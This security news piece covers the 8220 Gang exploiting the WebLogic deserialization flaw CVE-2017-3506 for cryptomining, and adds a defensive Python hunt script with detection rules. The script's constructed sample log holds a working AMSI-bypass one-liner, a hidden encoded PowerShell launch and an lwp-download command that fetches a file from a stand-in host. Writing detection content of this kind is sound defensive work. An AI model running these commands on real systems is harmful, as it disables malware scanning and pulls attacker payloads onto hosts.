Old Oracle WebLogic vulnerability currently used in cryptomining attacks
Take action: Ignoring a vulnerability because "it can't be exploited" is a bad decision. Any vulnerability will eventually be exploited, even six years down the line. Maintain reasonable patching discipline and don't count on being lucky. Nobody is.
The hacking group known as 8220 Gang has been found exploiting a security vulnerability in Oracle WebLogic servers that dates back six years.
By taking advantage of the flaw (CVE-2017-3506, a deserialization bug in WebLogic's Web Services component that Oracle fixed in its April 2017 Critical Patch Update), which allows remote execution of arbitrary commands on the server, the group has compromised vulnerable instances and built a botnet for distributing cryptocurrency mining malware.
Because the flaw lets a remote attacker run commands with the privileges of the WebLogic process, a successful exploit exposes any data that process can reach and effectively hands over the host. Administrators checking their exposure should confirm not only that the April 2017 fix is applied but also that the later bypass of that fix, CVE-2017-10271, is patched. The 8220 Gang, named after its use of port 8220 for command-and-control communications, scans the internet for misconfigured or vulnerable hosts to target.
In addition to exploiting the WebLogic vulnerability, the group has used SSH brute-force attacks to move laterally within compromised networks. In the latest attack chain, the Oracle WebLogic vulnerability is exploited to deliver a PowerShell payload, which then creates a second, obfuscated PowerShell script in memory.
This script disables the Windows Antimalware Scan Interface (AMSI) and launches a Windows binary that connects to a remote server to retrieve a third obfuscated payload. That payload is downloaded via an intermediate DLL file from one of the group's command-and-control servers over TCP port 9090, 9091, or 9092. Recent attacks have also abused lwp-download, a legitimate command-line downloader shipped with Perl's libwww-perl, to write arbitrary files to compromised Linux hosts; because the tool is already present and trusted on many systems, its misuse is harder for security teams to detect and block.
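The attack chain above gives a defender several concrete telemetry hooks: a WebLogic JVM spawning PowerShell, an in-memory AMSI bypass in script block logs, outbound connections to port 8220 or 9090 through 9092, lwp-download writing files on Linux hosts, and a burst of SSH authentication failures. The following hunt script is an added example, not code from the original article or from any vendor report on the group. It runs over a constructed, pipe-separated sample log embedded inline; the log format, the AMSI bypass strings used as markers, and the SSH failure threshold are all assumptions for illustration.

```python
"""
Hunt for the 8220 Gang tradecraft described above over constructed sample telemetry:
WebLogic JVM spawning PowerShell, in-memory AMSI tampering, connections to the
group's C2/payload ports, lwp-download abuse and SSH brute force.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Ports named in the article: 8220 for C2, 9090-9092 for payload retrieval.
SUSPECT_PORTS = {8220, 9090, 9091, 9092}
# Assumption: how many failed SSH logins from one source count as brute force.
SSH_FAIL_THRESHOLD = 5
# Assumption: generic AMSI-bypass markers; the article does not publish the group's script.
AMSI_PATTERNS = [re.compile(p, re.I) for p in (r"amsiInitFailed", r"AmsiUtils", r"AmsiScanBuffer")]

# Constructed sample telemetry (not real logs). Format: type=...|host=...|key=value...
SAMPLE_LOG = """\
type=proc|host=web01|parent=C:\\bea\\jdk\\bin\\java.exe|image=powershell.exe|cmd=powershell -nop -w hidden -enc SQBFAFgA
type=script|host=web01|content=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
type=net|host=web01|image=powershell.exe|dst=203.0.113.10|dport=9090
type=net|host=web01|image=chrome.exe|dst=198.51.100.5|dport=443
type=proc|host=lnx01|parent=bash|image=/usr/bin/lwp-download|cmd=lwp-download http://203.0.113.10/x /tmp/x
type=auth|host=lnx01|src=203.0.113.10|result=fail
type=auth|host=lnx01|src=203.0.113.10|result=fail
type=auth|host=lnx01|src=203.0.113.10|result=fail
type=auth|host=lnx01|src=203.0.113.10|result=fail
type=auth|host=lnx01|src=203.0.113.10|result=fail
type=proc|host=web02|parent=explorer.exe|image=powershell.exe|cmd=powershell Get-Process
"""


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def parse(line: str) -> dict:
    """Parse one 'key=value|key=value' telemetry line; values may contain '='."""
    return dict(field.split("=", 1) for field in line.rstrip("\n").split("|"))


def hunt(lines) -> list:
    """Return one Finding per matched rule, in the order events are seen."""
    findings = []
    ssh_failures = Counter()
    for raw in lines:
        if not raw.strip():
            continue
        ev = parse(raw)
        host, kind = ev["host"], ev["type"]
        if kind == "proc":
            image = ev.get("image", "").lower()
            parent = ev.get("parent", "").lower()
            # WebLogic runs inside a JVM; java.exe spawning PowerShell is the first stage.
            if parent.endswith("java.exe") and image.endswith("powershell.exe"):
                findings.append(Finding(host, "powershell-from-weblogic-jvm", ev.get("cmd", "")))
            # lwp-download is legitimate, so alert on its use rather than block the binary.
            if image.endswith("lwp-download"):
                findings.append(Finding(host, "lwp-download-abuse", ev.get("cmd", "")))
        elif kind == "script":
            content = ev.get("content", "")
            if any(p.search(content) for p in AMSI_PATTERNS):
                findings.append(Finding(host, "amsi-tamper", content[:60]))
        elif kind == "net":
            if int(ev.get("dport", 0)) in SUSPECT_PORTS:
                detail = f"{ev.get('image')} -> {ev.get('dst')}:{ev.get('dport')}"
                findings.append(Finding(host, "suspect-c2-port", detail))
        elif kind == "auth" and ev.get("result") == "fail":
            ssh_failures[(host, ev.get("src"))] += 1
    for (host, src), n in ssh_failures.items():
        if n >= SSH_FAIL_THRESHOLD:
            findings.append(Finding(host, "ssh-bruteforce", f"{n} failures from {src}"))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.splitlines()):
        print(f"{f.host:6} {f.rule:30} {f.detail}")
```

The benign PowerShell launched from explorer.exe and the browser connection on port 443 produce no findings, which is the point of keying the first rule on the JVM parent rather than on PowerShell itself. In production the same rules would read Sysmon process and network events and PowerShell script block logs (event 4104) instead of the constructed format used here.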